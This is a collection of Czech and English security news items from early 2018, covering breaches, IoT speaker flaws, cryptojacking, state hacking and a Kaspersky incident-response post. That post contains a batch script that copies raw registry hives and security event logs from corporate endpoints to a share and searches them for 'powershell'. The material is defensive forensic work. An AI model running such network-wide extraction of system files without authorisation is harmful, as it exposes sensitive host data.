Personál oddělení IT se soustředí spíše na to, co umí ochránit, a ne nutně na to, co je potřeba chránit, uvádí zpráva společnosti Kaspersky Labs. Jen třetina z dotazovaných organizací má rozsáhlé znalosti virtualizovaných řešení, která používají, a přibližně jedna čtvrtina má tyto znalosti buď slabé, nebo dokonce vůbec žádné.

Dave Shackleford to ví až příliš dobře. Je lektorem týdenního kurzu zabezpečení virtualizace a cloudu pro institut SANS. Na konci prvního dne obvykle zjistí, že 90 procent studentů, mezi které patří mnoho správců systémů, virtualizace i cloudu, síťových inženýrů i architektů, má jen velmi malou představu o tom, co je nutné zajistit při zabezpečení virtuální infrastruktury.

„Máme zde organizace, které jsou z 90 procent virtualizované, což znamená, že celé datové centrum funguje někde mimo jejich úložné prostředí. Nikdo o tom tímto způsobem ale nepřemýšlí,“ uvádí Shackleford, který je zároveň výkonným ředitelem společnosti Voodoo Security.

„Není neobvyklé, když i u skutečně velkých a vyzrálých podniků zjistíte, že netuší o velkém množství potřebných bezpečnostních opatření pro virtuální prostředí nebo je nějakým způsobem přehlížejí,“ dodává Shackleford.

Zmatek se zvyšuje tím, že virtualizace způsobila posun v odpovědnostech IT v mnoha organizacích, podotýká Greg Young, viceprezident výzkumu v Gartneru. Datové centrum obvykle zahrnuje týmy vyškolené pro provoz sítí a serverů, ale virtualizační projekty jsou často vedené týmy specializovanými pro servery.

„Problémy se zabezpečením sítě jsou záležitosti, kterými se dříve ve skutečnosti nemuseli zabývat,“ vysvětluje Young.

Průměrné náklady na nápravu úniku dat ve virtualizovaném prostředí přesahují 800 tisíc dolarů, uvádí Kapersky Labs. Náklady na nápravu průměrně směřující k milionu dolarů jsou téměř dvojnásobkem nákladů ve srovnání s útokem na fyzické infrastruktury.

Společnosti zatím nepovažují technologii za jedinou odpověď na tyto bezpečnostní problémy, uvádí se ve výsledcích průzkumu společnosti HyTrust. Přibližně 44 procent účastníků průzkumu kritizuje nedostatek řešení od současných dodavatelů, nevyzrálost samotných výrobců i nových nabídek nebo problémy s interoperabilitou nezávislou na platformě.

Přestože dodavatelé jako třeba Illumio, Catbird, CloudPassage nebo Bracket Computing přinášejí řešení některých bezpečnostních problémů, firmy si nemohou dovolit čekat na další řešení zabezpečení.

„Máte-li nyní virtualizovaných 50 procent, dostanete se za dva roky na podíl 70 až 90 procent virtualizace a přidávání zabezpečení nebude nijak snadnější,“ vysvětluje Shackleford.

„Když začnete přesouvat provoz do cloudu – na Amazon nebo Azure nebo k libovolnému jinému velkému poskytovateli cloudu – chcete mít své zabezpečení alespoň promyšlené nebo v ideálním případě už zavedené, abyste se nedostali do situace, kdy byste měli menší kontrolu, než máte dnes.“

Bezpečnější prostředí

Výše zmínění bezpečnostní profesionálové souhlasí, že firmy skutečně mohou mít k dispozici zabezpečené virtuální prostředí už dnes, pokud si dokážou vytvořit jasnou představu své virtuální infrastruktury, používat některé technologie a nástroje zabezpečení, které už mají, a lépe harmonizovat technologii a zabezpečení ve firmě. Tady jsou jejich rady, jak to udělat:

1. Získejte kontrolu nad svou virtuální infrastrukturou

„Velmi dobré zabezpečení můžete získat pomocí plánování – vykonávání kroků zároveň s ověřováním nasazení bezpečnostních opatření,“ prohlašuje Young. Začíná to správou inventáře.

„Tým zabezpečení potřebuje získat popis infrastruktury s ohledem na virtualizaci,“ připomíná Shackleford.

Podle něj musíte zjistit, kde jsou hypervizory, kde konzole pro správu, co je v interní infrastruktuře, kde to je a jaké jsou provozní procesy pro údržbu toho všeho. Dále je potřeba definovat standardy pro jejich uzamčení. „Když už nic jiného, ​​je nutné uzamknout alespoň hypervizory,“ dodává Shackleford.

Významní dodavatelé, jako jsou VMware a Microsoft, mají návody, které vám pomohou, stejně jako například organizace Centrum pro zabezpečení internetu (CIS, Center for Internet Security).

2. Přehodnoťte způsob, jakým se díváte na data a úložiště.

Lidé vážně potřebují přemýšlet o svém prostředí jako o sadě souborů, tvrdí Shackleford. „Je to velmi velká změna pro bezpečnostní profesionály, když si mají uvědomit, že se celé datové centrum spouští z vaší sítě SAN. Musejí se tedy alespoň seznámit s druhy používaných kontrol.“

Dodavatelé také přehodnocují své přístupy k zabezpečení a vítají třetí strany, které umějí poskytnout opravy zabezpečení.

„Dříve problém spočíval v tom, že jsme se ptali, zda lze použít detailně nastavené zabezpečení sítě ve virtualizovaném prostředí, a dostávali jsme od provozního personálu odpověď typu ‚absolutně ne, nedokážeme to podporovat‘, uvádí Chris King, viceprezident pro sítě a zabezpečení ve VMwaru.

„Nyní jsou k dispozici technologie, které jim umožní přehodnotit reakci na tento požadavek. Jakmile se útočník dostane dovnitř, zůstává uvězněn v daném místě a musí při útoku prorazit další zeď.“

3. Šifrování dat

To je v současné době nejdůležitější, ale stále mnoho firem šifrování nepoužívá, uvádí Chiu. „Přetrvává zde zastaralá myšlenka, že ‚pokud se něco nachází mezi našimi čtyřmi stěnami, nemusíme se o to obávat‘, ale to rozhodně neplatí. Je nutné šifrovat minimálně všechna data zákazníků a veškeré duševní vlastnictví, ať už se nachází ve vašem prostředí kdekoli,“ prohlašuje Chiu.

„Samozřejmě že cloud situaci ztěžuje, protože nevíte jistě, kde data jsou, ale šifrování veškerých těchto dat by mělo být základním principem.“

4. Koordinujte co nejdříve týmy zabezpečení a infrastruktury.

Je potřeba zajistit spojenectví a koordinaci mezi týmem zabezpečení a týmem infrastruktury již od počátku virtualizačních projektů, prohlašuje Chiu. „Je mnohem jednodušší integrovat bezpečnostní opatření a požadavky od počátku, než něco přidávat dodatečně.“

Zabezpečení také musí plánovat požadavky organizace na několik příštích let. „Plánuje společnost virtualizovat data související s platbami a zdravotními záznamy? Plánuje přechod na sdílené prostředí, kde dojde ke sloučení obchodních a aplikačních vrstev? Na tom všem záleží, protože v závislosti na tom budou vaše požadavky jiné,“ dodává Chiu.


Forever 21 confirms Payment Card Breach and provides further info on the incident
1.1.2018 securityaffairs Incindent

FOREVER 21 confirmed the presence of a malware at some point of sale (POS) systems in stores across the US.
On November 2017, the US clothes retailer FOREVER 21 announced it has suffered a security breach, the company now confirmed that hackers stole payment card data from its locations throughout the country for several months during 2017.

Even if the investigation is still ongoing, FOREVER 21 confirmed the presence of a malware at some point of sale (POS) systems in stores across the US, the malicious code was used at least between April 3, 2017, and November 18, 2017.

The payment made on the company website, forever21.com, were not affected by the incident.

The company explained that it has been using encryption technology since 2015 to protect its payment processes, but the investigation revealed that the encryption was switched off for some POS terminals at certain stores, a circumstance that allowed crooks to install the malware.

“The investigation determined that the encryption technology on some point-of-sale (POS) devices at some stores was not always on. The investigation also found signs of unauthorized network access and installation of malware on some POS devices designed to search for payment card data. The malware searched only for track data read from a payment card as it was being routed through the POS device. In most instances, the malware only found track data that did not have cardholder name – only card number, expiration date, and internal verification code – but occasionally the cardholder name was found.” reads the advisory published by the company.

“The investigation found that encryption was off and malware was installed on some devices in some U.S. stores at varying times during the period from April 3, 2017 to November 18, 2017. In some stores, this scenario occurred for only a few days or several weeks, and in some stores this scenario occurred for most or all of the timeframe.”

FOREVER 21
The company pointed out that not every POS terminal in affected stores was infected with the malware

“Each Forever 21 store has multiple POS devices, and in most instances, only one or a few of the POS devices were involved. Additionally, Forever 21 stores have a device that keeps a log of completed payment card transaction authorizations,” the company said while explaining the incident.

“When encryption was off, payment card data was being stored in this log. In a group of stores that were involved in this incident, malware was installed on the log devices that was capable of finding payment card data from the logs, so if encryption was off on a POS device prior to April 3, 2017, and that data was still present in the log file at one of these stores, the malware could have found that data.”

The company advised customers who shopped at its locations to monitor their credit transactions for any suspicious activity.


Hackers can remotely control thousands of Sonos and Bose speakers
1.1.2018 securityaffairs Hacking

Security experts at Trend Micro have demonstrated that certain models of Sonos and Bose speakers are affected by vulnerabilities that could allow attackers to hijack them.
Hackers can trigger the flaws to access the speakers and use them to play spooky sounds or to issue Alexa commands.

Only specific models of the two companies are actually affected by the issues, including the Sonos One and the Bose SoundTouch.

Attackers scan the Internet for vulnerable devices, once discovered flawed speakers they can use the API to instruct them into playing any audio file hosted at a specific URL.

“The impacted models allow any device on the same network to access the APIs they use to interface with apps like Spotify or Pandora without any sort of authentication.” reads the post published by Wired. “Tapping into that API, the researchers could simply ask the speakers to play an audio file hosted at any URL they chose, and the speakers would obey.”

speakers%20SoundofTA_Attack-Scenario-01

The experts at Trend Micro have found between 2,500 to 5,000 Sonos devices and 400 to 500 Bose devices open to audio hacking.

The attacks are more scaring in scenarios in which those voice assistant devices control smart home features from door locks, conditioners, and lighting.

“Whereas previous studies focused on seizing control of speakers like the Amazon Echo and Google Home, the results of our case study led to unique findings. These include security gaps that resulted from a simple open port that gave anyone on the internet access to the device and user information.” reads the post published by Trend Micro. “The first glaring finding was access to email addresses that are linked to music streaming services synced with the device. Another was access to a list of devices as well as shared folders that were on the same network as the test device. “

In testing devices running an older version of Sonos software, the researchers demonstrated that they leak detailed information, like the IP addresses and device IDs of gadgets that had connected to the speakers.

The attack that was theorized by Trend Micro were already reported in the wild, one Sonos customer earlier this year reported that her speaker started playing strange sounds.

Trend Micro shared its findings with Sonos, which quickly fixed the issues, including a denial-of-service (DoS) bug, while Bose still hasnìt replied.

The full report including the attack scenarios is available at the following link:

The Sound of a Targeted Attack.


Happy IR in the New Year!
1.1.2018 Kaspersky APT
At the end of last year Mr. Jake Williams from aka @MalwareJake asked a very important question about Lack of visibility during detecting APT intrusions in twitter. Results show us that endpoint analysis is the most important part of any research connected with APTs. Also, for sure endpoint forensics is critical during any Incident Response (IR) because in many cases the initial intrusion happened too far away in time so there are no relevant logs and no backups to identify the first victim and the way how attackers were moving from one computer to another. At least once a year we have such issues during IR activities with our customers. In these cases we use a very simple script that is uploaded to every Windows computer in the corporate network to collect logs, NTFS data, entries from the Windows registry and strings from the binary files to find out how exactly the attackers were moving through the network. It’s holiday season and it is our pleasure to share this script with you. We hope it will help to save a lot of time during IR and any malware/APT investigations providing the so much needed visibility into potentially infected endpoint PCs.

Let’s start with collecting the collect file system information from the computer using the wonderful forensics tool FLS (administrative privileges required) from the open source package Sleuthkit. The only thing that the official Windows build lacks is Windows XP/2003 support. If you are planning to run the tool on Windows XP/2003 machines then you may need to recompile FLS from sources using MinGW or download our our pre-compiled version (see the end of this blog post). We also do not want to write the results to the computers’ hard drive to avoid wiping its unallocated space. So the tool is going to utilize a big (approx. 300 MB free space for one corporate computer ) share folder that should be prepared in advance and should be accessible from all computer in the network that will execute the script:

set data_share=”\\corp_share\data_share”
net use y: %data_share%
mkdir y:\%COMPUTERNAME%_report
set dp=y:\%COMPUTERNAME%_report
echo %date% %time% %COMPUTERNAME% > %dp%\report.log
fls.exe -lpr \\.\c: >> %dp%\fls.log

It will take several (dozens of) minutes to create the full list of filesystem entries for the computer’s system drive. After that we are ready to extract the inode numbers of Windows registry files that are interesting to us. We will use the ICAT tool from the same Sleuthkit package and the RegLookup utility to grab modification timestamps of every windows registry key. At the end we want to collect all the strings (using the tools either by Mr. Mark Russinovich or from http://pubs.opengroup.org/onlinepubs/9699919799/utilities/strings.html tool (our choice)) from the registry files to search for any data from the unallocated space and deleted keys:

::Get Windows reg files
findstr /i “windows\/system32\/config\/system ” %dp%\fls.log | findstr /vi “profile” | findstr /vi log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\system.reg.inode
for /f “tokens=1” %%a in (%dp%\system.reg.inode) do icat \\.\c: %%a > %dp%\system.reg
findstr /i “windows\/system32\/config\/software ” %dp%\fls.log | findstr /vi “profile” | findstr /vi log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\software.reg.inode
for /f “tokens=1” %%a in (%dp%\software.reg.inode) do icat \\.\c: %%a > %dp%\software.reg
::Convert reg files
reglookup.exe %dp%\system.reg > %dp%\system.reg.log
reglookup.exe %dp%\software.reg > %dp%\\software.reg.log
::Get strings from reg files
strings -afel %dp%\system.reg > %dp%\system.str.log
strings -afeb %dp%\system.reg >> %dp%\system.str.log
strings -afel %dp%\software.reg > %dp%\software.str.log
strings -afeb %dp%\software.reg >> %dp%\software.str.log

Once finished, we are ready to do the same with the Windows system and security eventlog files. To parse log the files will we use the open source tools evtxexport and evtexport by Mr. Joachim Metz

::Get Logs
findstr -i “windows\/system32\/winevt/logs/system.evtx” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\system.evtx.inode
for /f “tokens=1” %%a in (%dp%\system.evtx.inode) do icat \\.\c: %%a > %dp%\system.evtx
findstr /i “windows\/system32\/winevt/logs/security.evtx” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\security.evtx.inode
for /f “tokens=1” %%a in (%dp%\security.evtx.inode) do icat \\.\c: %%a > %dp%\security.evtx
strings -afeb %dp%\system.evtx > %dp%\system.evtx.str.log
strings -afel %dp%\system.evtx >> %dp%\system.evtx.str.log
strings -afeb %dp%\security.evtx > %dp%\security.evtx.str.log
strings -afel %dp%\security.evtx >> %dp%\security.evtx.str.log
::Conv evtx
evtxexport.exe %dp%\system.evtx > %dp%\system.evtx.res.log
::get evt logs
findstr /i “windows\/system32\/config/SysEvent.Evt” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\SysEvent.Evt.inode
for /f “tokens=1” %%a in (%dp%\SysEvent.Evt.inode) do icat \\.\c: %%a > %dp%\SysEvent.Evt
findstr /i “windows\/system32\/config/SecEvent.Evt” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\SecEvent.Evt.inode
for /f “tokens=1” %%a in (%dp%\SecEvent.Evt.inode) do icat \\.\c: %%a > %dp%\SecEvent.Evt
::get strings from evt
strings -afeb %dp%\SysEvent.Evt > %dp%\SysEvent.Evt.str.log
strings -afel %dp%\SysEvent.Evt >> %dp%\SysEvent.Evt.str.log
strings -afeb %dp%\SecEvent.Evt > %dp%\SecEvent.Evt.str.log
strings -afel %dp%\SecEvent.Evt >> %dp%\SecEvent.Evt.str.log
::Conv evt
evtexport.exe %dp%\SysEvent.Evt > %dp%\SysEvent.Evt.res.log

Actually this is it. All logs will be collected in our share’s folder so we may search for something interesting. In the latest cases with Carbanak we were looking for mentions of the malicious Powershell scripts so let’s add the following string in our version of this script:

findstr /i “powershell” %dp%\*.log >> %dp%\report.log

This will provide us with a complete picture of how the attackers were moving from one computer to another with exact timestamps and artifacts on NTFS, registry and logs that is critical for fast and effective IR with no lack of endpoint visibility. GLHF and HAPPY IR in NEW YEAR!

PS. LINK 2 FILE

SHA256 (HappyNewYear.zip) = c166d1e150db24ea27014e1d4a9eeb79f9e317ded9918a623fee8e66a010f9fa


Nový virus dokáže obelstít antiviry, varovali bezpečnostní experti

1.1.2018 Novinky/Bezpečnost Viry
Národní bezpečnostní tým CSIRT.CZ varoval před zákeřným malwarem Loki, který se v posledních týdnech šíří internetem bez nadsázky jako lavina. Tento počítačový virus zneužívá populární kancelářský balík Office od společnosti Microsoft, aby se vyhnul odhalení.

„Malware Loki se šíří pomocí produktů Microsoft Office, a to z důvodů, aby se vyhnul detekci antivirových programů. Ukrývá se v tabulkách Microsoft Excel a dalších aplikacích Office,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň zdůraznil, že nezvaný návštěvník se snaží od uživatele vylákat přístupové údaje k různým účtům. S jejich pomocí pak mohou počítačoví piráti získat přístup k citlivým údajům uživatelů, případně jejich on-line účty zneužít i bez přímého přístupu k počítači.

Trhlina již byla opravena
„Útok využívá zranitelnost CVE-2017-0199 Microsoft Office/WordPad RCE, která byla opravena v dubnu a updatovaná v září,“ prohlásil bezpečnostní expert.

Kybernetičtí nájezdníci tedy zneužívají toho, že uživatelé instalaci aktualizací velmi často podceňují. Najde se tedy poměrně početná skupina uživatelů, kteří jsou stále v ohrožení, protože aktualizaci pro kancelářský balík Office nestáhli.

„Chyba existuje ve způsobu, jakým Office a WordPad analyzuje speciálně vytvořené soubory. Útok vyžaduje, aby oběť otevřela nebo zobrazila soubor, ve kterém je ukrytý malware,“ uzavřel Bašta.

S ohledem na možná bezpečnostní rizika by uživatelé s instalací aktualizací – aktuálně v případě kancelářského balíku Office – neměli otálet.


Pomáháte pirátům vydělat? Kyberměny se těží na miliardě počítačů bez vědomí uživatelů

1.1.2018 Novinky/Bezpečnost Kriminalita
Počítačové viry bylo ještě před pár lety možné odhalit zpravidla na první pohled. V počítači totiž dělaly tak velkou neplechu, že si jich uživatel všiml hned. Proti tomu moderní škodlivé kódy se snaží zůstat co nejdéle v anonymitě a vydělávají kyberzločincům velké peníze. Podle aktuálně zveřejněné analýzy AdGuard těží viry potají kybernetické mince na více než miliardě počítačů.
Virtuálních měn existuje mnoho. Jednou z nejstarších a aktuálně nejpopulárnějších jsou tzv. bitcoiny. Ty vznikly už v roce 2009, větší popularitě se ale těší v posledních letech. Tato měna byla vytvořena tak, aby se nedala ovlivňovat žádnou vládou ani centrální bankou.

Kybernetické mince „razí“ síť počítačů se specializovaným softwarem naprogramovaným tak, aby uvolňoval nové mince stabilním, ale stále klesajícím tempem. Počet mincí v oběhu má dosáhnout nakonec 21 miliónů, což má být kolem roku 2140.

Bitcoiny a další kryptoměny se těší velké popularitě především coby prostředek pro investici. Kurzy však často kolísají. Evropský bankovní úřad kvůli tomu dokonce varoval spotřebitele, že neregulované virtuální měny představují velké riziko. Jejich vklady totiž nejsou nijak chráněny. 

pátek 29. prosince 2017, 10:50

To je dramatický nárůst, ještě podle říjnové statistiky totiž bylo podobnými škodlivými kódy napadeno pouze půl miliardy strojů. 

Za pouhé dva měsíce se tak počítačovým pirátům podařilo infikovat další stovky miliónů počítačů. Kyberzločinci využívají toho, že za těžbu virtuálních měn – například velmi populárních bitcoinů – nemusí uživatelé zaplatit teoreticky ani korunu.

Pokud mají dostatečně výkonný počítač, mohou si nainstalovat speciální software a jeho pomocí kryptoměny doslova těžit. Tento program totiž používá předem nastavené výpočty, jejichž výsledkem je zisk virtuálních mincí. Za ty je pak možné klidně nakupovat prakticky cokoliv.

Vydělávají milióny
Jenže právě toho jsou si vědomi také počítačoví piráti. Ti stále častěji instalují podobný software do cizích počítačů místo klasických virů. Podobně zotročené stroje pak kyberzločincům vydělávají peníze, aniž by o tom majitelé počítačů měli ponětí.

I když přesné odhady nejsou k dispozici, počítačoví podvodníci si touto cestou pravděpodobně vydělají několik miliónů korun každý den podle nejstřízlivějších odhadů - soudě podle aktuální hodnoty bitcoinů.

Ta se nyní pohybuje okolo 14 600 dolarů, tedy v přepočtu bezmála 315 000 korun. Na začátku letošního roku přitom jeden bitcoin stál méně než 1000 dolarů.

Antiviry nemusí pomoci
Uživatelé si mohou sami všimnout, že je podobný software na jejich počítači nainstalován podle toho, že je daný stroj nebývale vytížený, tedy reaguje pomaleji, než je běžné. V takovém případě se vyplatí prohledat nainstalované aplikace a doplňky v internetových prohlížečích a ty podezřelé odinstalovat.

Antiviry totiž u podobných programů a doplňků nemusí rozpoznat, že jsou nainstalované bez vědomí uživatele.

Bitcoiny a další kryptoměny se uchovávají ve speciálních virtuálních peněženkách. Více se o této problematice dozvíte v našem dřívějším článku.


Bezpečnost citlivých informací zasílaných elektronicky se posílí

1.1.2018 Novinky/Bezpečnost Zabezpečení
Posílit bezpečnost citlivých informací posílaných elektronicky má za cíl novela zákona o utajovaných informacích, která bude účinná od začátku příštího roku. Změny mají zohlednit elektronizaci státní správy a posílit ochranu utajovaných informací.

Důvodem změn je to, že platný zákon umožňuje použít pasáže o administrativní bezpečnosti u utajovaných informací v papírové podobě. Nová úprava postupy ochrany informací promítá také pro zpracování a přenos utajovaných informací v elektronických spisech nebo v certifikovaném informačním systému.

„Prostřednictvím uvedené změny dojde k dokumentaci celého životního cyklu utajované informace v elektronické podobě při dodržování podmínek administrativní bezpečnosti, jako je tomu v případě utajovaných informací v listinné nebo nelistinné podobě," píše se v důvodové zprávě novely.

Na utajované informace v elektronické podobě se budou až na výjimky používat ustanovení, která obsahují požadavky na vyznačování údajů a evidenci utajované informace. Například se neuplatní ustanovení upravující podmínky přepravy a přenášení utajované informace.


Bojíte se, že někdo zveřejní vaše nahé fotky? Pošlete nám je a my je zablokujeme, vyzývá Facebook

1.1.2018 Novinky/Bezpečnost Sociální sítě
Populární sociální síť zkouší bojovat proti aktům zveřejněným z pomsty. Bezpečnostní experti varují, že její řešení nemusí být bezpečné.

Pilotní projekt boje proti fotografiím obnažených uživatelů zveřejněným z pomsty spustila v Austrálii sociální síť Facebook. Společnost ve spolupráci s tamní vládou připravila systém, který je založen na „hashování“ nahrávaných snímků.

Potenciální oběť musí Facebooku poskytnout snímky, o kterých se domnívá, že se je někdo pokusí zveřejnit na Facebooku, a sociální síť poté při nahrávání veškerých fotek porovnává nahrávané snímky s poskytnutými akty. Pokud najde shodu, nahrání a zveřejnění snímku zablokuje.

Ohrožení uživatelé mají Facebooku zasílat choulostivé snímky prostřednictvím služby Messenger. Podle australské komisařky pro internetovou bezpečnost Julie Inman Grant se lidé nemusí obávat, že jejich akty poskytnuté sociální síti budou uloženy na serverech Facebooku.

„Neukládají se tam snímky, ale digitální stopa a poté se používá umělá inteligence a jiné technologie pro porovnávání fotografií,“ zdůraznila. Podle zpravodajského serveru ABC však není jasné, zda hashování je dostatečně dobrou technologií na to, aby se vypořádalo s pokusy obcházení filtrů založených na umělé inteligenci, jako je pozměnění původního snímku.

Není to bezpečné, varují experti
Existují také vážné obavy z toho, jak Facebook naloží s tak citlivými snímky, které mu poskytnou sami uživatelé, když firma v minulosti čelila obavám ohledně zabezpečení a ochrany osobních dat.

„Z koncepčního hlediska jde o záslužnou myšlenku, ale fungovalo by to lépe, kdyby uživatel dostal možnost využít samoobslužný nástroj pro načtení souborů na Facebook,“ uvedl pro server Infosecurity-magazine.com Andrew Clarke ze společnosti Identity EMEA. Podle bezpečnostního experta společnosti ESET Marka Jamese existují vážné obavy, že by tato služba mohla být zneužita podvodníky.

„Pravděpodobnost, že se Facebook sám stane terčem útoku, je sice malá, ale pokud by se tak stalo a uživatelé by byli podvedeni a poslali takto citlivé snímky třetí osobě, mohli by se vystavit dalšímu riziku vydírání,“ varoval James. „ESET neustále zdůrazňuje, aby lidé pečlivě zvažovali, kam si ukládají intimní fotografie, a aby je pokud možno neměli uloženy on-line v jakékoli podobě,“ dodal.

Pilotní projekt Facebooku probíhá kromě Austrálie ve třech dalších zemích. Má jít jen o jednu ze součástí řady opatření, která tato sociální síť zavádí v souvislosti s bojem proti rostoucímu trendu zveřejňování intimních snímků uživatelů bez jejich souhlasu.


Pozor na soubory v Messengeru, mohou ukrývat malware pro těžbu kryptoměn
1.1.2018 Živě.cz
Viry
Odborníci z Trend Micro informovali o novém malwaru, který se šíří prostřednictvím komunikátoru Messenger. V případě, že vám v jeho desktopové verzi, ať už v rámci Facebooku nebo webu Messenger.com, přijde odkaz na video, zpozorněte.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Dorazí-li vám podobná zpráva na Messenger, na soubor či odkaz v žádném případě neklikejte
Za odkazem se totiž nemusí ukrývat pouze vtipný klip s koťátky, ale i doplněk do prohlížeče Chrome se skrytou instalací. Ten pojmenovali v Trend Micro jako Digmine a z názvu se dá vytušit jeho primární účel. Na pozadí totiž umožňuje těžbu kryptoměny Monero. Využívá k tomu open-source nástroj XMRig.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
V případě, že oběť využívá Facebook v Chromu, kde se neodhlásí, umí si Digmine spustit na pozadí instanci Chromu a nastartovat jeho těžební komponentu. Zároveň obsahuje i propagační část, která začne odesílat stejné škodlivé zprávy všem kontaktům v Messengeru.


Ruští hackeři útočí na poštovní účty novinářů

1.1.2018 Novinky/Bezpečnost BigBrother
Ruští hackeři od roku 2014 napadli účty elektronické pošty zhruba 200 novinářů, jejichž kritika na adresu Moskvy dráždí Kreml. Napsala to agentura AP s odvoláním na analýzu bezpečnostní internetové firmy Secureworks. Cílem hackerů je prý získat citlivou poštu, kterou by proti žurnalistům mohli v budoucnu použít.
úterý 26. prosince 2017, 12:31 - Washington/Moskva

V seznamu napadených je padesátka zpravodajů zahraničních médií působících v Moskvě, ale i málo známí blogeři z ruských provincií nebo bývalých sovětských republik. Postižená byla i řada prominentních opozičních novinářů, například televizní moderátorka Xenia Sobčaková, která kandiduje v prezidentských volbách.

Na seznamu je také britský novinář Eliot Higgins, zakladatel investigativní skupiny Bellingcat, která mimo jiné vyšetřuje pád malajsijského letadla nad Donbasem v roce 2014. Terčem hackerů byla i Ellen Barryová, bývalá moskevská zpravodajka listu The New York Times.

Za útoky podle společnosti Secureworks stojí hackerská skupina Fancy Bear, kterou podle amerických tajných služeb řídí ruská vláda. Členové Fancy Bear měli podle tvrzení expertů loni zaútočit na server americké Demokratické strany s cílem kompromitovat prezidentskou kandidátku Hillary Clintonovou.


Těžba kryptoměn už potají zneužívá miliardu uživatelů. Patříte mezi ně?
1.1.2017 cdr.cz
Bezpečnost
Pomáháte někomu vydělávat pomocí svého počítače bez vašeho vědomí? Pravděpodobně ano. Přehrávání videí se stalo novým terčem na poli vytěžování kryptoměn z neinformovaných návštěvníků. Zneužitých je již okolo jedné miliardy za měsíc.

Celkem alarmující množství videostreamů provozuje tajně na pozadí těžbu kryptoměn s využitím výkonu počítačů jejich návštěvníků.

V nedávné době výzkumníci ze společnosti AdGuard uveřejnili informaci, že některé stránky se snaží využít toho, že jsou vysoce frekventované právě těžbou kryptoměny. Počet zneužitých nic netušících návštěvníků je již kolem jedné miliardy. Skript je přitom umísťován tam, kde uživatelé stráví velké množství času, tedy ideální situace v kombinaci s delšími videi (např. nelegálními streamy filmú).

Bylo dokonce zjištěno, že tři ze čtyřech stránek mají kód vložený na identickém místě. Stále je největším trnem v oku situace, že nikdo neoznámí uživatelům nic o těžbě či využití výkonu jejich zařízení.

Nejznámnější ochranou jsou tzv. Ad-blokátory. Ty částečně dokáží zabránit těžbě kryptoměny, nejsou však neprůstřelné. Mnozí uživatelé dále zůstávají v ohrožení, a to díky oblíbenéCoinHive metodě. Jsou i takové názory, že se dá CoinHive využít jako jakási alternativa k reklamám. Pravdou však zůstává, že bez souhlasu majitele by neměla být využívána.

Ale jak výzkumníci AdGuard sami konstatovali: „Pochybujeme, že všichni majitelé těchto stránek jsou si vědomi, že do těchto přehrávačů je zabudována i skrytá těžba kryptoměny.“

Obliba v této činnosti, kryptojackingu, narůstá s alarmující rychlostí. Podle AdGuard se jedná o epidemii. Od doby, kdy se tento problém poprvé objevil, uplynulo pár měsíců a nyní se již jedná o miliardy poškozených měsíčně. Není však zcela jasné, jak se s tímto problémem vypořádat.

SimilarWeb statistics odhaduje, že tyto stránky navštíví každý měsíc zhruba 992 milionů návštěvníků. Díky těmto něvštěvníkům je vytěžena kryptoměna v celkové hodnotě zhruba 320 000 dolarů měsíčně.

Nedávno jsme informovali o tom, že pirátská zátoka, The Pirate Bay, je podezřelá z těžby kryptoměny. Posléze se tak potvrdilo a zástupce The Pirate Bay přiznal, že se jednalo jen o pokus, zda je tento web schopný na své náklady vydělat skrze těžbu kryptoměn. Touto těžbou si zhruba vydělají přes 12 000 dolarů měsíčně.


Vietnam's 10,000-strong 'Cyber Army' Slammed by Rights Groups
1.1.2018 securityweek BigBrothers
The deployment of 10,000 cyber warriors to fight online dissent in Vietnam adds a grim "new dimension" to controls on free speech in the Communist country, a rights group has said.

Vietnam routinely jails its critics and closely monitors activists on social media, which is not banned unlike in neighbouring China.

A top Vietnamese general this week said a 10,000-strong brigade dubbed "Force 47" has been tasked with fighting "wrongful views" spreading on the internet, according to state media reports.

It was not immediately clear what Force 47 is responsible for, but observers anticipate the cyber soldiers will escalate smear campaigns against activists online.

Rights groups rounded on the move.

Human Rights Watch deputy Asia director Phil Robertson said the cyber scouts announcement was a "shocking new dimension to Vietnam's crackdown on dissent".

Others said the tactic is designed to squeeze online critics.

"This is just the latest plank in a campaign to curb internet freedoms at all costs," Shawn Crispin, Committee to Protect Journalists' Southeast Asia representative, told AFP Friday.

"While they can't unplug Facebook, Instagram and the likes outright, they can apply more and more pressure on those platforms and it looks like these cyber troops are their latest attempt to do that."

Vietnam's internet is classified as "not free", according to web watchdog Freedom House, which ranks it second only to China in Asia.

Around half of the country's 93 million people have access to the internet, and the country also ranks among Facebook's top 10 users by numbers.

Vietnamese officials did not respond to a request for comment from AFP.

Earlier this year the government asked Facebook and YouTube to remove "toxic content" from its sites.

In August, the president called for tougher internet controls, saying that groups have used the web to launch campaigns against the government that threaten the "prestige of the party's leaders and the state".

A conservative leadership in power since last year has waged a crackdown on dissidents, with at least 15 arrested this year, according to Amnesty International.

Several other have been handed heavy jail terms, joining scores of activists already behind bars.

Force 47 is likely to include commentators hired to publish pro-government material and counter critics, said Madeline Earp, senior research analyst with Freedom House.

"Vietnam very much follows China's example when suppressing internet freedom, particularly when it comes to blocking websites and arresting dissidents," she told AFP.

For some activists, the cyber troop announcement is no surprise. But activist Nguyen Chi Tuyen said the new force marked an escalation in state tactics of repression.

"The main purpose for Force 47 is to try and control news and public opinion on the internet... they want to protect the party, not protect the country," said Tuyen, more commonly known by his online handle Anh Chi.


WeChat is set to become China’s official electronic ID system
1.1.2018 securityaffairs Mobil

China’s largest social media network, WeChat, is set to become an official electronic ID system in the country, an ID pilot program was launched in Guangzhou’s Nansha District.
WeChat (‘Weixin’ in China) is China’s largest social media network, according to Tencent Holdings, the platform had 980 million monthly active users as of late September.

A project launched by the government of Beijing could use WeChat as the official electronic personal identification system.

A WeChat ID pilot program was launched in Guangzhou’s Nansha District, citizens in the area will soon be able to identify themselves through the social network. According to Xinhua, over 30,000 people have applied for ID cards in the 24 hours following the launch of the project.

The WeChat ID could be used to authenticate citizens to online and offline government services, it will also give them access to many other online services such as hotel registration and ticketing.

